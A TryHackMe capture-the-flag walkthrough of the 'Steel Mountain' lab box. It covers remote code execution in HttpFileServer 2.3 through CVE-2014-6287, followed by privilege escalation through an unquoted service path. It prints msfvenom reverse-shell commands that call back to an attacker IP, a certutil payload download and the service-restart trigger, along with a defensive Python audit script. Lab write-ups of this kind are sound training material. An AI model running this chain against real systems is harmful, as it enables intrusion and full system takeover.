TryHackMe Walkthrough: Steel Mountain (with & without Metasploit)
This room is a box hosting two web services, and one of them is hosting a vulnerable service. We are able to use an exploit to achieve remote code execution. After an initial shell, winPEAS shows we are able to use an unquoted service path vulnerability to escalate to nt authority\system.
This room can be completed with and without Metasploit. First, I will use Metasploit, then use public exploit code to recreate the same process.
You can find this room at https://tryhackme.com/room/steelmountain
First, we start with some recon. After running a basic nmap, we can see there are 12 ports open.
nmap -A -vv -oA reconbasic 10.10.22.135
After further review, we can also see there is a web server running on port 8080. After navigating to http://10.10.22.135:8080, we can see it is running HttpFileServer 2.3.
After a little research, HttpFileServer 2.3 is vulnerable to CVE-2014-6287, which is a remote code execution vulnerability. This has a Metasploit module which we can leverage. After opening the msfconsole, we need to find and set up the exploit. First, `search 2014-6287` to find the exploit. Then, `use 0` to select the exploit.
Once the exploit is selected, we need to set up some options. Using the command `options`, we can get a list of what we need to change. In this case, we’ll need to change the `RHOSTS` and `RPORT`.
set RHOSTS 10.10.22.135
set RPORT 8080
Once the options are set, use the command `run` and you should receive a meterpreter shell.
After a little bit of searching, we can find the user.txt flag at `C:\Users\bill\Desktop\user.txt`.
Now that we have the initial shell, we need to find a way to escalate privileges. Using the meterpreter command `upload "/root/Desktop/PEASS/winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASany.exe"` (the quotes are needed because the path contains a space), we can upload winPEAS from our local machine to the remote machine. To run this tool, we first need to use the command `load powershell`, then `powershell_shell` to get into the PS shell. From there, we can use the command `. .\WinPEASany.exe` to run the privilege escalation enumeration tool. After running winPEAS, we can find some paths to escalate. The creator of this box expected us to use the Advanced SystemCare service unquoted path vulnerability.
First, we need to understand what the unquoted path vulnerability is. An unquoted path vulnerability stems from how the Windows API resolves an executable path that contains spaces but is not wrapped in quotes when it launches a service. For example, if a service is registered at `C:\Program Files\Cool Service\Service.exe`, Windows treats each space as a possible end of the file name and will attempt to launch the following executables in this order. If one doesn’t exist, it moves on to the next:
- C:\Program.exe
- C:\Program Files\Cool.exe
- C:\Program Files\Cool Service\Service.exe
More information can be found in Jeff Liford’s blog post: http://www.ryanandjeffshow.com/blog/2013/04/05/the-microsoft-windows-unquoted-service-path-vulnerability/
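As an added example (my own, not code from the room or the walkthrough), the following Python reproduces that search order and turns it into the check a defender would run over exported service definitions, such as the PathName column of Win32_Service. The function names and the sample service list are constructed for this example. It implements the general rule, which is that every space-delimited prefix of an unquoted path is tried before the intended binary, so for the IObit path used later on this box it also reports `C:\Program Files.exe` as a candidate in addition to the two the walkthrough lists.

```python
"""Audit Windows service image paths for the unquoted-path weakness.

Added example, not part of the original walkthrough. It models the search
order Windows applies to an unquoted executable path containing spaces and
flags service entries exposed to it. SAMPLE_SERVICES is constructed data in
the shape of Win32_Service PathName values; all names here are this example's own.
"""
import re
from typing import List, Tuple

# Matches the first ".exe" in a path; used as the boundary of the executable name.
_EXE_RE = re.compile(r"\.exe", re.IGNORECASE)


def _with_default_extension(prefix: str) -> str:
    """Windows appends .exe only when the last path component has no extension."""
    last_component = prefix.rsplit("\\", 1)[-1]
    return prefix if "." in last_component else prefix + ".exe"


def candidate_paths(image_path: str) -> List[str]:
    """Return the executables Windows would try, in order, for a service image path.

    For an unquoted path every space is a possible end of the file name, so each
    space-delimited prefix is tried first; Windows stops at the first one that
    exists. A quoted path has no ambiguity and yields only the quoted executable.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return [path[1 : path.index('"', 1)]]
    tokens = path.split(" ")
    return [_with_default_extension(" ".join(tokens[:i])) for i in range(1, len(tokens) + 1)]


def is_exposed(image_path: str) -> bool:
    """True when the path is unquoted and a space occurs before the executable name ends.

    Spaces that only appear in the arguments after the .exe are harmless, because
    the real binary is the first candidate tried.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return False
    match = _EXE_RE.search(path)
    executable_part = path[: match.start()] if match else path
    return " " in executable_part


def quoted_image_path(image_path: str) -> str:
    """Return the remediated form: executable wrapped in quotes, arguments untouched."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    match = _EXE_RE.search(path)
    if match is None:
        return f'"{path}"'
    return f'"{path[: match.end()]}"{path[match.end():]}'


def audit_services(services: List[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (service name, image path, hijack candidates) for each exposed service.

    The hijack candidates are every path Windows tries before the intended binary;
    any of them sitting in a directory writable by a low-privileged user is a finding.
    """
    findings = []
    for name, path in services:
        if is_exposed(path):
            candidates = candidate_paths(path)
            findings.append((name, path, candidates[:-1]))
    return findings


# Constructed sample in the shape of Win32_Service (Name, PathName) rows.
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",  # the service discussed on this box
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("ExampleHostSvc",  # constructed: spaces only in the arguments, not exposed
     r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("CoolService",  # constructed: correctly quoted, not exposed
     r'"C:\Program Files\Cool Service\Service.exe" --serve'),
    ("PlainAgent",  # constructed: no spaces at all
     r"C:\Tools\agent.exe"),
]


if __name__ == "__main__":
    for name, path, candidates in audit_services(SAMPLE_SERVICES):
        print(f"[!] {name}: {path}")
        for candidate in candidates:
            print(f"      tried first: {candidate}")
        print(f"      fix: binPath= {quoted_image_path(path)}")
```

The remediation is to quote the image path in the service configuration, which `quoted_image_path` produces under the assumption that the first `.exe` marks the end of the executable name. Writable-directory checks are deliberately left out so the script runs offline against an exported list; on a live host they are the second half of the audit.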
Now, to exploit this, we will need to use the path `C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe`. Using the example above as a guide, we need to create a program at either of the following paths to run:
- C:\Program.exe
- C:\Program Files (x86)\IObit\Advanced.exe
This means we will have to put our `Advanced.exe` file in the `C:\Program Files (x86)\IObit\` directory.
Using msfvenom, I generated a reverse shell and started a listener on port 4444.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.182.72 LPORT=4444 -f exe -o Advanced.exe
nc -lvnp 4444
On the victim box, we need to stop the service, upload the shell, and start the service again. First, `sc stop AdvancedSystemCareService9`. Then, use the Meterpreter shell to `upload /root/Advanced.exe` to the victim box. Now, we need to start the service again using `sc start AdvancedSystemCareService9` in a normal shell. Once started, check your listener and you should have a shell opened as nt authority\system!
Now, a little searching and you can retrieve the `root.txt` contents.
Without Metasploit
This box can be done without the use of Metasploit using the exploit code for the same CVE-2014-6287.
Using searchsploit, we find that there is a Python RCE exploit, and it can be copied to our current directory using the command `searchsploit -m 39161.py`.
Now we have the exploit code. Looking at it, we need to do a few things to get set up.
- The usage shows we need to be running a web server hosting netcat. Kali has a copy of nc.exe in `/usr/share/windows-binaries`. Then we can host this with Python: `python -m SimpleHTTPServer 80`
- The code shows we need to change the local IP and the port we will be listening on.
Once these are changed, a listener is open, and we’re hosting nc.exe, we’re ready to go!
python 39161.py 10.10.0.27 8080
Now that we have the initial shell again, we will use the same unquoted service path vulnerability to escalate. Since we already know the vulnerability, we don’t need to rerun winPEAS. Using msfvenom, we can generate another `Advanced.exe` shell (if necessary) and serve it using the Python simple server.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.182.72 LPORT=4444 -f exe -o Advanced.exe
python -m SimpleHTTPServer
Once we are hosting Advanced.exe (SimpleHTTPServer listens on port 8000 by default), we use the built-in certutil.exe on the victim to fetch the file from our local system.
certutil.exe -urlcache -split -f http://10.10.182.72:8000/Advanced.exe
Now that the Advanced.exe file is on the system, open another listener and then use the following commands to stop and start the service again to get the nt authority\system shell.
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9